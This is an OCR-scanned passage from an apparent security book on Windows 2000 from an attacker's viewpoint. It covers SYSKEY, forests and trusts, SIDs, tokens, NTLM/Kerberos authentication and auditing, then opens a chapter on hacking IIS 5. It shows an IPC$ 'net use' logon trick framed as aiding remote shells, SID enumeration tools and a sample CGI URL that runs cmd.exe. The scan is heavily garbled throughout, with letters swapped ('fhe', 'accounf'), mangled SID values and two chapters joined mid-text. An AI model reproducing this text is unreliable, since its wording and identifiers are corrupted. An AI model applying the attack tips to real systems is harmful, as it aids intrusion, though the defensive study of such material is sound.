Under NT, password hashes were stored directly in the SAM file. Starting with NT4 
Service Pack 3, Microsoft provided the ability to add another layer of encr)q)tion to the 
SAM hashes called SYSKEY. SYSKEY, short for SYStem KEY, essentially derived a ran- 
dom 128-bit key and encr)q)ted the hashes again (not the SAM file itself, just the hashes). 
To enable SYSKEY on NT4, you have to run the SYSKEY command, which presents a 
window like the following: 




Hitting the Update button in this window presents further SYSKEY options, namely the 
ability to determine how or where the SYSKEY is stored. The SYSKEY can be stored in 
one of three ways: 

T Mode 1 Stored in the Registry and made available automatically at boot 
time (this is the default) 

■ Mode 2 Stored in the Registry but locked with a password that must be 
supplied at boot time 

A Mode 3 Stored on floppy disk that must be supplied at boot time 
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The following illustration shows how these modes are selected: 




Windows 2000 implements SYSKEY Mode 1 by default, and thus passwords stored in 
either the SAM or Active Directory are encr5^ted with SYSKEY as well as hashed. It does 
not have to be enabled manually, as with NT4 SP3 and greater. In Chapters 8 and 14, we 
will discuss the implications of SYSKEY and mechanisms to circumvent it. 

FORESTS, TREES, AND DOMAINS 

To this point, we have been discussing NT/2000 in the context of individual computers. 
A group of NT/2000 systems can be aggregated into a logical unit called a domain. Win- 
dows 2000 domains can be created arbitrarily by simply promoting one or several Win- 
dows 2000 servers to a domain controller. Domain controllers (DCs) are secure storage 
repositories for shared domain information and also serve as the centralized authentica- 
tion authorities for the domain. In essence, a domain sets a distributed boundary for 
shared accounts. All systems in the domain share a subset of accounts. Unlike NT, which 
specified single-master replication from Primary Domain Controllers (PDCs) to Backup 
Domain Controllers (BDCs), Windows 2000 domain controllers are all peers and engage 
in multi-master replication of the shared domain information. 

As a consequence of Windows 2000's implementation of Active Directory, domains 
are no longer the logical administrative boundary they once were under NT. Supra- 
domain structures called trees and forests exist above domains in the hierarchy of AD. 
Trees are mostly related to naming conventions and have few security implications, but 
forests demarcate the boundary of Windows 2000 directory services and are thus the ul- 
timate boundary of administrative control. Pigure 2-2 shows the structure of a sample 
Windows 2000 forest. 
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Figure 2-2. A sample Windows 2000 forest 



Although we're glossing over a great deal of detail about Active Directory and Win- 
dows 2000's new domain model, we are going to stop this discussion here in order to 
keep focused on fhe aspecf of domains fhaf are fhe primary fargef for malicious attackers: 
accounf information. 

Scope: Local, Global, and Universal 

You've probably noticed fhe continuing references fo local accounfs and groups versus 
global and universal accounfs. Under NT, members of local groups had fhe pofenfial fo 
access resources wifhin fhe scope of fhe local machine, whereas members of global groups 
were pofenfially able fo access resources domain- wide (more on domains in a minufe). Lo- 
cal groups can confain global groups, buf nof vice-versa because local groups have no 
meaning in fhe confexf of a domain. Thus, a f 5 ^ical sfrafegy would be fo add domain us- 
ers (aggregafed in a global group fo ease adminisfrafive burden) fo a local group fo define 
access confrol fo local resources. For example, when a compufer joins a domain, fhe Do- 
main Admins global group is aufomafically added fo fhe Local Adminisfrafors group, 
allowing any members of Domain Admins fo aufhenficafe fo and access all resources on 
fhe compufer. 

Windows 2000 complicafes fhis somewhaf. Table 2-5 lisfs fhe scopes relevanf fo 
Windows 2000. 

Depending on the mode of fhe domain {native versus mixed-mode, see "References and 
Furfher Reading"), fhese f)^es of groups have differenf limifafions and behaviors. 
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May Be Granted Access to 



Scope 


Description 


Members May inciude 


Resources On 


Local 


Intra-computer 


Accounts from any 
domain, global groups 
from any domain, and 
universal groups from 
any domain 


Local computer only 


Domain 

Local 


Intra-domain 


Accounts, global 
groups, and universal 
groups from any 
domain; domain local 
groups from the same 
domain 


Only in the same domain 


Global 


Inter-domain 


Accounts from the 
same domain and 
global groups from 
the same domain 


Any domain 
in the forest 


Universal 


Forest-wide 


Accounts from any 
domain, global groups 
from any domain, and 
universal groups from 
any domain 


Any domain 
in the forest 



Table 2-5. Windows 2000 Group Scopes 



Trusts 

Much like NT4, Windows 2000 can form inter-domain relationships called trusts. Trust 
relationships only create the potential for inter-domain access, they do not explicitly en- 
able it. A trust relationship is thus often explained as building abridge without lifting the 
tollgate. For example, a trusting domain may use security principles from the trusted do- 
main to populate access control lists (ACLs) on resources, but this is only at the discretion 
of the administrators of the trusting domain and is not inherently set up. 

Trusts can be said to be one-way or two-way. A one-way trust means that only one domain 
trusts the other, not vice versa. Two-way trusts define two domains that trust each other. 
A one-way trust is useful for allowing administrators in one domain to define access control 
rules within their domain, but not vice-versa. 

Trusts can also be transitive or nontransitive. Transitive trusts mean that if Domain A 
transitively trusts Domain B and Domain B transitively trusts Domain C, then Domain 
A transitively trusts Domain C. 
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By default, all domains within a Windows 2000 forest have transitive, two-way trusts between 
each other. Windows 2000 can establish one-way, nontransitive trusts to other domains 
outside of the forest or to NT4 domains. 

Administrative Boundaries: Forest or Domain? 

We are frequently asked the question: "What is the actual security boundary within a 
Windows 2000 forest, a domain or the forest?" The short answer to this question is that 
while the domain is the primary administrative boundary, it is no longer the airtight 
security boundary that it was under NT, for several reasons. 

One reason is fhe exisfence of universal groups fhaf may be granfed privileges in any 
domain wifhin fhe foresf because of fhe fwo-way fransifive frusfs fhaf are automatically 
esfablished befween every domain wifhin fhe foresf. For example, consider members of 
fhe Enferprise Admins and Schema Admins who are granfed access fo cerfain aspecfs of 
child foresfs by defaulf. These permissions musf be manually removed fo prevenf mem- 
bers of fhese groups from performing actions wifhin a given domain. 

You musf also be concerned abouf Domain Admins from all ofher domains wifhin fhe 
foresf as well. A liffle-known facf abouf Windows 2000 Acfive Direcfory foresfs, as sfafed 
in fhe Windows 2000 Server Resource Kif Deploymenf Planning Guide, is fhaf "[D]omain 
adminisfrafors of any domain in fhe foresf have fhe potential fo fake ownership and mod- 
ify any informafion in fhe Configurafion confainer of Acfive Direcfory. These changes 
will be available and replicate fo all domain confrollers in fhe foresf. Therefore, for any 
domain fhaf is joined fo fhe foresf, you musf consider fhaf fhe Domain Adminisfrafor of 
fhaf domain is frusfed as an equal fo any ofher Domain Adminisfrafor." The Deploymenf 
Planning Guide goes on fo specify fhe following scenarios fhaf would necessifafe fhe 
creation of more fhan one foresf. 

(The following maferial is quofed direcfly from fhe Windows 2000 Server Resource 
Kif Deploymenf Plarming Guide — see fhe "References and Furfher Reading" secfion.) 

If individual organizations: 

Do Not Trust Each Other's Administrators 

A representation of every object in the forest resides in the global catalog. It is possible for 
an administrator who has been delegated the ability to create objects to intentionally or 
unintentionally create a "denial of service" condition. You can create this condition by 
rapidly creating or deleting objects, thus causing a large amount of replication to the global 
catalog. Excessive replication can waste network bandwidth and slow down global catalog 
servers as they spend time to process replication. 

Cannot Agree on a Forest Change Policy 

Schema changes, configuration changes, and the addition of new domains to a forest have 
forest-wide impact. Each of the organizations in a forest must agree on a process for 
implementing these changes, and on the membership of the Schema Administrators and 
Enterprise Administrators groups. If organizations cannot agree on a common policy, 
they cannot share the same forest. . . 
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Want to Limit the Scope of a Trust Relationship 

Every domain in a forest trusts every other domain in the forest. Every user in the forest 
can be included in a group membership or appear on an access control list on any computer 
in the forest. If you want to prevent certain users from ever being granted permissions to 
certain resources, then those users must reside in a different forest than the resources. If 
necessary, you can use explicit trust relationships to allow those users to be granted access 
to resources in specific domains. 

If you are unable to yield administrative control of your domain, we suggest that you 
maintain separate forests. Of course, you then lose all the benefits of a unified forest 
model, such as a shared global catalogue and directory object space, and you also add the 
overhead of managing an additional forest. This is a good illustration of the trade-off 
between convenience and security. 

The Flip Side: Can I Trust an Internet-Facing Domain? 

We are also often asked the opposite question: is it pertinent to create a separate forest in 
order to add semi-trusted domains to the organization? This question is especially perti- 
nent to creating a domain that will be accessible from the Internet, say for a Web server 
farm. This situation can be handled in one of two ways. One, you could create a separate 
forest /domain and establish old-style, explicit one-way trust to a domain within the 
main forest to protect it from potential compromise of the Internet-facing forest/ domain. 
Again, you would lose the benefit of a shared directory across all domains in this scenario 
while gaining the burden of multiforest management. 

The other option is to collapse the Internet-facing domain into an organizational unit 
(OU) within a domain that is administrated by trusted persormel. The administrator of 
the OU can then be delegated control over only those objects that are resident in the OU. 
Even if that accoimt becomes compromised, the damage to the rest of the forest is limited. 

Implications of Domain Compromise 

So what does it mean if a domain within a forest becomes compromised? Let's say a 
hacker knocks over a domain controller in an Internet-facing domain, or a disgruntled 
employee suddenly decides to play rogue Domain Admin. Here's what they might 
attempt, summarizing the points made in this section on forest, tree, and domain security. 

At the very least, every other domain in the forest is at risk because Domain Admins 
of any domain in the forest have the ability to take ownership and modify any informa- 
tion in the Configuration container of Active Directory and may replicate changes to that 
container to any domain controller in the forest. 

Also, if any external domain accounts are authenticated in the compromised do- 
main, the attacker may be able to glean these credentials via the LSA Secrets cache (see 
Chapter 8), expanding his influence to other domains in the forest. 

Finally, if the root domain is compromised, members of the Enterprise Admins or 
Schema Admins have the potential to exert control over aspects of every other domain in 
the forest, unless those groups have had their access limited manually. 
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To summarize Windows 2000 forests, trees, and domains from the malicious hacker's 
perspective: 

Domain controllers are the most likely target of malicious attacks, since they house a great deal 
more account information. They are also the most likely systems in a Windows 2000 environment 
to be heavily secured and monitored, so a common ploy is to attack more poorly defended systems 
on a domain and then leverage this early foothold to subsequently gain complete control of any do- 
mains related to it. The extent of the damage done through the compromise of a single system is 
greatly enhanced when accounts from one domain are authenticated in other domains via use of 
trusts. The boundary of security in Windows 2000 is the forest, not the domain as it was under NT. 



SIDS 

So far, we have been talking about security principles using their friendly names, such as 
Administrator or Domain Admins. However, Windows NT/ 2000 manipulates these ob- 
jects internally using a globally imique 48-bit number called a Security Identifier, or SID. 
This prevents the system from confusing the local Administrator accoimt from Computer 
A with the identically-named local Administrator accoimt from Computer B, for example. 

The SID is comprised of several parts. Let's take a look at a sample SID: 

S-l-5-2 1-1507 001333-12045507 64-101 12842 98-500 

SIDs are prefixed with an S, and its various components are separated with hyphens. 
The first value (in this example, 1) is the revision number, and the second is the identifier 
authority value (it's always 5 for Windows 2000). Then there are four subauthority values 
(21 and the three long strings of numbers, in this example) and a Relative Identifier (RID) 
(in this example, 500) that make up the remainder of a SID. 

SIDs may appear complicated, but the important concept to understand is that one 
part of the SID is unique to the installation or domain, and another part is shared across 
all installations and domains (the RID). When Windows 2000 is installed, the local com- 
puter issues a random SID. Similarly, when a Windows 2000 domain is created, it is as- 
signed a unique SID. Thus, for any Windows 2000 computer or domain, the subauthority 
values will always be unique (unless purposely tampered with or duplicated, as in the 
case of some low-level disk-duplication techniques). 

However, the RID is a constant value across all computers or domains. For example, a 
SID with RID 500 is always the true Administrator account on a local machine. RID 501 is 
the Guest account. On a domain, RIDs starting with 1000 indicate user accounts (for ex- 
ample, RID 1015 would be the fourteenth user account created in the domain). Suffice to 
say that renaming an account's friendly name does nothing to its SID, so the account can 
always be identified, no matter what. Renaming the true Administrator account only 
changes the friendly name — the account is always identified by Windows 2000 (or a mali- 
cious hacker with appropriate tools) as the account with RID 500. 

Some other well-known SIDs include: 
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S-1-1-0 


Everyone 


S-1-2-0 


Interactive users 


S-1-3-0 


Creator Owner 


S-1-3-1 


Creator Group 



Why You Can’t Log On as Administrator Everywhere 

As is obvious by now (we hope), the Administrator account on Computer A is different 
from the Administrator account on Computer B because they have different SIDs, and 
Windows 2000 can tell them apart even if humans can'f. 

This feafure can cause headaches for fhe uninformed hacker. Occasionally in this 
book, we will encounter situations where logging on as Administrator fails. For example: 

C:\>net use \\192 . 168 . 234 . 44\ipc$ password /u: Administrator 

System error 1326 has occurred. 

Logon failure: unknown user name or bad password. 

One mighf be fempted to turn away at this point, without recalling that Windows auto- 
matically passes the currently logged-on users credentials during network logon at- 
tempts. Thus, if fhe user was currently logged on as Administrator on the client, this 
logon attempt would be interpreted as an attempt to logon to the remote system using the 
local Administrator from fhe clienf. Of course, this account has no context on the remote 
server. You can manually specify fhe logon contexf using fhe same nef use command 
with the remote domain, computer name, or IP address prepended to the username with 
a backslash, like so: 

C:\>net use \\192 . 168 . 234 . 44\ipc$ password /u : domain\Administrator 

The command completed successfully. 

Obviously, prepend the remote computer name or IP address if the system you are 
cormecting to is not a member of a domain. Remembering fhis liftle frick will come in 
handy when we discuss remofe shells in Chapfer 7; fhe fechnique we use to spawn such 
remote shells often results in a shell rurming in the context of fhe SYSTEM accounf. Exe- 
cufing nef use commands within the LocalSystem context cannot be interpreted by 
remote servers, so you almost always have to specify fhe domain or computer name as 
shown in the previous example. 

Viewing SIDs with user2sid/sid2user 

You can use the user2sid tool from Evgenii Rudnyi fo exfract SIDs. Here is user2sid being 
run againsf the local machine: 

C:\>user2sld Administrator 



S-1-5-2 1-1507 001333-12045507 64-10112842 98-500 
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Number of subauthorities is 5 
Domain is CORF 

Length of SID in memory is 28 bytes 
Type of SID is SidTypeUser 

The sid2user tool performs the reverse operation, extracting a username given a SID. 
Using the SID extracted in the previous example: 

C:\>sid2user 5 21 1507001333 1204550764 1011284298-500 



Name is Administrator 

Domain is CORF 

Type of SID is SidTypeUser 

Note that the SID must be entered starting at the identifier authorify number (which is 
always 5 in the case of Windows 2000), and spaces are used to separate components 
rather than hyphens. 




As we will discuss in Chapter 4, this information can be extracted over an unauthenticated session 
from any Windows 2000 system running SMB services in its default configuration. 



PUTTING IT ALL TOGETHER: 

AUTHENTICATION AND AUTHORIZATION 

Now that you know the players involved, let's discuss the heart of fhe Windows 2000 
security model: authentication and access control (authorization). How does the operat- 
ing system decide whether a security principle can access a protected resource? 

First, Windows 2000 must determine if it is dealing with a valid security principle. This 
is done via authentication. The simplest example is a user who logs on to Windows 2000 via 
the console. The user strikes the standard CTRL-ALT-DEL attention signal to bring up the 
Windows 2000 secure logon facility and then enters an accormt name and password. The 
secure logon facility passes the entered credentials through the user mode components re- 
sponsible for validating them, as shown in Figure 2-1 (Winlogon and LSASS). Assuming 
the credentials are valid, Winlogon creates a toketi (or access token) that is then attached to the 
users logon session and is produced on any subsequent attempt to access resources. 




The secure logon facility can be Trojan-ed by Administrator-equivalent users, as we will discuss in 
Chapter 8. 



The Token 

The token contains a list of all of the SIDs associated with the user account, including the 
account's SID, and the SIDs of all groups and special identities of which the user account 
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is a member (for example. Domain Admins or INTERACTIVE). You can use a tool like 
whoami (inluded in the Windows 2000 Resource Kit) to discover what SIDs are associ- 
ated with a logon session, as shown here: 



C : \ >whoami /all 

[User] = "CORPDC\j smith" S-1-5-21-1822001333-1575872029-1985284398-1000 



[Group 


1] 


[Group 


2] 


[Group 


3] 


[Group 


4] 


[Group 


5] 


[Group 


6] 



"CORPDC\None" S-1-5-21-1822001333-1575872029-1985284398-513 
"Everyone" S-1-1-0 

"BUILTIN\ Administrators" S-1-5-32-544 
"LOCAL" S-1-2-0 

"NT AUTHORITYN INTERACTIVE" S-1-5-4 

"NT AUTHORITY\Authenticated Users" S-1-5-11 



(X) SeChangeNotifyPrivilege 

(0) SeSecurityPrivilege 

(0) SeBackupPrivilege 

(0) SeRestorePrivilege 

(0) SeSystemtimePrivilege 

(0) SeShutdownPrivilege 

(0) SeRemoteShutdownPrivilege 

(0) SeTakeOwnershipPrivilege 

(0) SeDebugPrivilege 

(0) SeSystemEnvironmentPrivilege 

(0) SeSystemProf ilePrivilege 

(0) SeProf ileSingleProcessPrivilege 

(0) SeIncreaseBasePriorityPrivilege 

(X) SeLoadDriverPrivilege 

(0) SeCreatePagef ilePrivilege 

(0) SeIncreaseQuotaPrivilege 

(X) SeUndockPrivilege 



= Bypass traverse checking 
= Manage auditing and security log 
= Back up files and directories 
= Restore files and directories 
= Change the system time 
= Shut down the system 
= Force shutdown from a remote system 
= Take ownership of files or other obje 
= Debug programs 

= Modify firmware environment values 
= Profile system performance 
= Profile single process 
= Increase scheduling priority 
= Load and unload device drivers 
= Create a pagefile 
= Increase quotas 

= Remove computer from docking station 



This example shows that the current process is run in the context of user jsmith, who 
is a member of Administrators and Authenticated Users and also belongs to the special 
identities Everyone, LOCAL, and INTERACTIVE. You can also see what privileges 
jsmith possesses. 




DumpTokenInfo by David Leblanc is another good token analysis tool. See the “References and 
Further Reading’’ section for a link. 



When jsmith attempts to access a resource, such as a file, the Security Reference Monitor 
(SRM) compares his token to the Discretionary Access Control List (DACL) on the object. 
A DACL is a list of SIDs that are permitted to access the object, and in what ways (such 
as read, write, execute, and so on). If one of the SIDs in j smith's token matches a SID in 
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the DACL, then jsmith is granted access as specified in the DACL. This process is dia- 
grammed in Figure 2-3. 

Impersonation 

To save network overhead, Windows NT/2000 is designed to impersonate the user 
account context when it requests access to resources on a remote server. Impersonation 
works by letting the server notify fhe SRM fhaf if is femporarily adopting fhe foken of fhe 
clienf making fhe resource requesf . The server can fhen access resources on behalf of fhe 
clienf, and fhe SRM validafes all access as normal. The classic example of impersonation 
is anonymous requesfs for Web pages via IIS. IIS impersonafes fhe llJSR_machinename 
accounf during all of fhese requesfs. 

Restricted Token 

Windows 2000 infroduces a new kind of foken, fhe restricted token. A resfricfed foken is 
exacfly like a regular foken excepf fhaf if can have privileges removed, and SIDs in fhe 
foken can be marked deny-only or restricted. Resfricfed tokens are used when Windows 2000 



Authenticates 
with account 
name/ password 



User jsmith 








WinLogon 




Figure 2-3. Authorization in Windows 2000 
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wants to impersonate a user account at a reduced privilege level. For example, an appli- 
cation might derive a restricted token from the primary or impersonation token in order 
to run an untrusted code module if inappropriafe actions could be performed using fhe 
primary foken's full privileges. 

Delegation 

Delegation is a new feafure in Windows 2000 fhaf allows fhe fransfer of confrol over an 
objecf fo ofher accounfs. We mention if here because if is offen confused wifh aspecfs of 
impersonation, when if really has nofhing fo do wifh if. Delegafion is simply an easy 
mechanism for reseffing DACLs on direcfory objecfs so fhaf anofher user accounf can 
adminisfer fhose objecfs. 

Network Authentication 

Local aufhenficafion fo Windows 2000 via fhe CTRL-ALT-DEL affenfion signal is sfraighf- 
forward, as we have described. However, logging on fo Windows 2000 via fhe nefwork, 
fhe primary goal of fhe malicious hacker, involves exploiting nefwork aufhenficafion. We 
will discuss fhis here briefly fo inform discussions in lafer chapfers on several weaknesses 
associafed wifh some componenfs of Windows 2000 nefwork aufhenficafion protocols. 

Bofh NT and 2000 primarily utilize challenge/response aufhenficafion, wherein fhe 
server issues a random value (fhe challenge) fo fhe clienf, which fhen performs a crypfo- 
graphic hashing funcfion on if using fhe hash of fhe user's password and sends fhis newly 
hashed value (fhe response) back fo fhe server. The server fhen fakes ifs copy of fhe user's 
hash from fhe local SAM or AD, hashes fhe challenge if jusf senf, and compares if fo 
fhe clienf 's response. Thus, no passwords ever traverse the wire during Windows NT/2000 
authentication, even in encrypted form. The challenge/response mechanism is illusfrafed 
in Figure 2-4 and is described more fully in KB Arficle Q102716. 

Sfep 3 of fhis diagram is fhe mosf critical. NT / 2000 can use one of fhree differenf hashing 
algorifhms fo scramble fhe 8-byfe challenge: 

T LANMan (LM) hash 

■ NTLM hash 

▲ NTLM version 2 (NTLMv2) 

In Chapfer 5, we will discuss a weakness wifh fhe LM hash fhaf allows an attacker 
wifh fhe abilify fo eavesdrop on fhe nefwork fo guess fhe password hash ifself relatively 
easily, and fhen use if fo affempf fo guess fhe acfual password offline. Yes, even fhough 
fhe password hash never fraverses fhe nefwork! 

To combaf fhis, Microsoft released an improved NT-only algorifhm, NTLM, wifh 
NT4 Service Pack 3 and a furfher secured version in NT4 SP4 called NTLM v2. Windows 
95/98 clienfs do nof natively implemenf NTLM, so fhe securify offered by NTLM and 
NTLMv2 was nof f 5 ^ically deployed on mixed networks in the past (the DSClient utility 
that comes on the Windows 2000 CD-ROM upgrades Windows 9x clients so that they can 
perform NTLM and NTLMv2 aufhenficafion). 
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Homogenous Windows 2000 environments can use the built-in Kerberos v5 protocol 
that is new in Windows 2000 (we discuss Windows 2000 Kerberos in Chapter 16). How- 
ever, Windows 2000 is completely backward compatible with LM, NTLM, and NTLMv2 
and will downgrade to the appropriate authentication protocol if Kerberos carmot be 
negotiated. Kerberos will only be used if both client and server support it, both machines 
are referenced by fheir DNS or machine name (nof IPaddress), and bofh the client and 
server belong to the same forest (unless a third-party Kerberos implementation is used) . 

Table 2-6 presents a quick summary of NT/2000 LAN-orienfed aufhenticafion 
mechanisms. 

For simplicify's sake, we have purposely left out of fhis discussion considerafion of 
Microsoft's Challenge Handshake Authentication Protocol (MS-CHAP), which is used 
for remofe access, Web-based authenficafion, as well as ofher profocols used by 



Chapter 2 : The Windews 2000 Security Architecture frem the Hacker's Perspective 



29 



Authentication Type 


Supported Ciients 


Comments 


LANMan 


All 


WFW and Windows 9x must 
use this, but it is susceptible to 
eavesdropping attacks; Dsclient 
allows Windows 9x to use NTLM. 


NTLM 


NT4 SP3, 
Windows 2000 


Much more robust security than 
LANMan. 


NTLMv2 


NT4 post-SP4, 
Windows 2000 


Improved security over NTLM, 
recommended for heterogeneous 
NT4/2000 environments. 


Kerberos 


Windows 2000 only 


Longer track record security-wise, 
but only used if end-to-end 
Windows 2000 and intra-forest. 


Table 2-6. Windows LAN-oriented authentication protocois 



Windows in different situations. Although these protocols are slightly different from 
what we have described so far, they still depend on the four core protocols described in 
Table 2-6, which are used in some form or another to authenticate all network access. 



AUDITING 

We've talked a lot about authentication and access control so far, but the Windows 
NT/ 2000 security subsystem can do more than simply grant or deny access to resources. 
It can also audit such access. The Windows 2000 audit policy, that is, which events to re- 
cord, is defined via the Security Policy interface (see Chapter 16). The audit policy is 
stored in the Local Security Authority Subsystem (LSASS; see Figure 2-1), which passes 
it to the Security Reference Monitor (SRM) at bootup and whenever it changes. The 
SRM works in concert with the Windows 2000 Object Manager to generate audit re- 
cords and send them to LSASS. LSASS adds relevant details (the account SID perform- 
ing the access, and so on) and writes them to the Event Log, which in turn records them 
in the Security Log. 

If auditing is set for an object, a System Access Control List (SACL) is assigned to the 
object. The SACL defines which operations by which users should be logged in the 
security audit log. Both successful and unsuccessful attempts can be audited. 

For W indows 2000 systems, we recommend that the system audit policy be set to the 
most aggressive settings (auditing is disabled by default). That is, enable audit of suc- 
cess/failure for all of the Windows 2000 events except process tracking, as shown in 
Figure 2-5. 
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Figure 2-5. Recommended Windows 2000 audit settings 



Note that enabling auditing of object access does not actually enable auditing of all 
objecf access; if only enables fhe pofenfial for objecf access fo be audifed. Auditing musf 
still be specified on each individual objecf. On Windows 2000 domain confrollers, heavy 
audifing of directory access may incur a performance penalfy. Make sure fo failor your 
audif seffings fo fhe specific role of fhe sysfem in quesfion. 



SUMMARY 

Here is a lisf of some of fhe imporfanf poinfs we have covered in fhis chapter: 

T All access fo Windows 2000 is authenticated (even if if is as fhe Everyone identify), 
and an access token is builf for all successfully aufhenficafed accounfs. This token 
is used fo authorize all subsequenf access fo resources on fhe sysfem by fhe 
Securify Reference Monitor (SRM). To date, no one has publicly disclosed a 
technique for defeating fhis archifecfure, ofher fhan rurming software in kernel 
mode, where fhe SRM operafes. 

■ The Local Adminisfrafor accoimf is one of fhe juiciesf fargefs on a Windows 2000 
sysfem because if is one of fhe mosf powerful accounfs. All ofher accounfs 
have very limifed privileges relative fo fhe Adminisfrafor. Compromise of 

fhe Adminisfrafor is fhus almosf always fhe ulfimafe goal of an affacker. 

■ The Adminisfrafors group is fhe juiciesf fargef on a local Windows 2000 
sysfem, because members of fhis group inherif Adminisfrafor-equivalenf 
privileges. Domain Admins and Enterprise Admins are fhe juiciesf fargefs 
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on a Windows 2000 domain because joining their ranks elevates privileges 
to all-powerful on the domain or forest. Compromise of an accounf fhaf is 
already a member of one of fhese groups, or addition of a compromised accounf 
to fhe local Adminisfrafors, Domain Admins, or Enterprise Admins is thus almost 
always the ultimate goal of an atfacker. 

■ The Everyone group can be leveraged to gain a foothold on a Windows 2000 
system without authenticating. Also, the INTERACTIVE identity is required in 
many instances to execute privilege escalation attacks against Windows 2000 
(see Chapter 6). 

■ Account information is kept in the SAM (%systemroot%\system32\ 
configXsam) or Active Directory (%systemroot%\ntds\ntds.dit) by default. 
Passwords are irreversibly scrambled (hashed) such that the corresponding 
cleartext carmot be derived directly, although it can be cracked, as we will see 
in Chapter 8. It can also be stored in a reversibly encrypted format (cleartext) 
if the reversible encr)q)tion option is selected on the domain controller via the 
local security policy (disabled by default). 

■ Domain controllers are the most likely target of malicious atfacks, since fhey 
house all of fhe account information for a given domain. They are also the 
most likely systems in a Windows 2000 environment to be heavily secured 
and monitored, so a common ploy is to attack the more poorly defended 
sysfems on a domain and then leverage this early foothold to subsequently 
gain complete control of any domains related to it. 

■ The extent of the damage done through the compromise of a single system is 
greatly enhanced when accounts from one domain are authenticated in other 
domains via use of trusts. 

■ The boimdary of trust in Windows 2000 is the forest, not the domain as under NT. 

■ Windows 2000 uses SIDs to identify accoimts internally; the friendly account 
names are simply conveniences. Remember to use the domain or computer 
name prepended to the username when using the net use command to logon 
to remote systems (it's the SID that Windows 2000 interprets, not the friendly 
accoimf name). 

■ Local authentication differs from network authentication, which uses the 
LM/NTLM protocols by default under Windows 2000. The LM authentication 
algorithm has known weaknesses that make it vulnerable to attacks; these 
will be discussed in Chapter 5. Windows 2000 can optionally use the Kerberos 
network authentication protocol in homogeneous, intra-forest environments, 
but there is currently no mechanism to force the use of Kerberos. 

A Besides authentication and authorization, Windows 2000 can audit success 
and failure of all object access, if such auditing is enabled at the system level 
and, specifically, on the object to be audited. 
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W e've come a long way so far in our attack of Windows 2000 and given certain as- 
sumptions about the target environment (availability of CIFS/SMB services, for 
example), most LAN-based Windows 2000 servers would have cried "Uncle!" 
back at Chapter 5. 

As you all know, though, Windows is no longer confined to the safe and easy-to- 
pick environs of the internal file and print LAN. Indeed, according to Netcraft at press 
time, Windows NT is one of the most populous platforms on the Internet today. In fact, 
Windows 2000 recently overtook NT in the number of servers deployed. 

Assuming that most of these Internet-facing servers have taken the obvious precautions, 
such as erecting an intermediary firewall and disabling CIFS/SMB and other potentially 
insecure default services, how then does an attack proceed? 

The simple answer is via the front door, of course. The world is begirming to awaken 
to the fact that even though network and OS-level security might be tightly configured 
(using the guidelines recommended to this point), the application layer always provides 
a potential avenue of entry for intruders. Furthermore, the services on which those appli- 
cations are built open yet another door for attackers. In this chapter, we discuss the most 
popular of these alternative routes of conquest: Internet Information Services (IIS) 5 and 
Web applications. 



HACKING IIS 5 

IIS security exploits have enjoyed a long, rich tradition. Microsoft's flagship Web server 
platform has been plagued by such vulnerabilities as source code revelation attacks like 
::$DATA, information exposures via sample scripts like showcode.asp, piggybacking 
privileged command execution on backend database queries (MDAC/RDS), and 
straightforward buffer overflow exploits (IISHack). Although all these issues have been 
patched in IIS 5, a new crop of exposures has arisen to keep system administrators busily 
applying Hotfixes well after migration to Windows 2000. We discuss some of the most 
critical exposures in this chapter. First, however, let's take a brief detour to discuss some 
IIS hacking basics. 

For those who are familiar with basic Web hacking approaches, we know you can't 
wait to sink your teeth into the main meat of this chapter — skip right to the section on IIS 
Buffer Overflow Attacks. 

IIS Hacking Basics 

Before we describe some of the more debilitating IIS vulnerabilities, it will be helpful to 
lay some basic groundwork. As mentioned earlier in this chapter, a basic understanding 
of HTTP is a fundamental qualification for hacking any Web server, and IIS is no exception. 
In addition, IIS adds its own unique variations to basic Web protocols that we review here 
also. Our approach is a somewhat historical recitation of the development of the Web, 
with apologies to some of the finer details, which we happily mangle here to present a 
broad overview of several complex technologies. 
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Basic HTTP 

Because HTTP is text-based, it's quite easily understood. Essentially, HTTP is a stateless 
file-transfer protocol. Files are requested with the HTTP GET method (or verb) and are 
typically rendered within a Web browser. In a browser, the GET request looks like this: 

http : / / WWW . victim . com/ files /index . html 

This requests the file index.html from fhe /files virtual directory on the system 
www.victim.com. The / files virtual directory maps to an actual directory on the system's 
disk, for example, G:\inetpub\wwwroot\files\. To the server, however, the request 
appears as follows: 

GET /files/index. html HTTP/1.0 

Assuming the file exisfs and no ofher errors resulf, the server then replies with the 
raw data for index.html, which is rendered appropriately in the browser. Other HTTP 
methods like POST, PUT, and so on exist but, for our purposes, GET usually suffices. The 
response from fhe server includes fhe HTTP response code appropriate for fhe resulf of 
fhe requesf. In fhe case of a successful dafa refrieval, an HTTP 200 OK response is gener- 
ated. Many other HTTP response codes exist: common ones include 404 Not Found, 403 
Access Denied, and 302 Object Moved (this is often used to redirect requests to a login 
page to authenticate a user before servicing the original request). 

CGI 

One major variation on a basic HTTP file request is executable behavior. Early in its de- 
velopment, everyone decided the World Wide Web needed to advance beyond a simple, 
static file-retrieval system. So, d 5 mamic capabilities were added via so-called Gommon 
Gateway Interface (CGI) applications, which were, essentially, applications that ran on 
the server and generated d 5 mamic content tailored to each request, rather than serving up 
the same old HTML page. The capability to process input and generate pages on-the-fly 
greatly expanded the functional potential of a Web application. A CGI application can be 
invoked via HTTP in much the same marmer as previously described: 

http : II WWW . victim . com/scripts/cgi . exe ? var i able 1+ variable 2 

This feeds variablel and variableZ to the application cgi.exe (the plus symbol (+) acts 
as a space to separate the variables, for example, cmd.exe+ / c+dir+C: \ ). Nearly any exe- 
cutable on a Windows 2000 system can behave like a server-side CGI application to exe- 
cute commands. As you see in the upcoming section on file system traversal attacks, the 
Windows 2000 command shell, cmd.exe, is a popular target for affackers looking for 
easy CGI pickings. 

ASP and ISAPI 

Because of their nature as discrete programs that consumed system resources with each 
HTTP request, CGI executables soon became quite inefficient in servicing the Web's 
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burgeoning needs. Microsoft addressed these shortcomings by formulating two distinct 
technologies to serve as the basis for Web applications: Active Server Pages (ASP) and the 
Internet Server Application Programming Interface (IS API). These two technologies still 
underlie the two major types of IIS-based applications deployed today. 

ASP works much differently than CGI, but it appears to behave much the same way 
to the end user: 

http : II WWW . victim . com/ scripts/ script . asp?variablel=X&variable2=Y 

Similar to the previous CGI example, this feeds the parameter X to the ASP script. asp 
as variable number one, Y as variable number two, and so on. T 5 ^ically, the result of this 
process is the generation of an HTML page with the output of the script. asp operation. 
ASP scripts are usually written in a human-readable scripting language like Visual Basic, 
but the technology is largely (Microsoft) language-neutral. 

ISAPI generally is much less visible to end users. In fact, Microsoft uses many IS/VPI 
DLLs to extend IIS itself and most folks are none the wiser (incidentally, the /\SP interpreter 
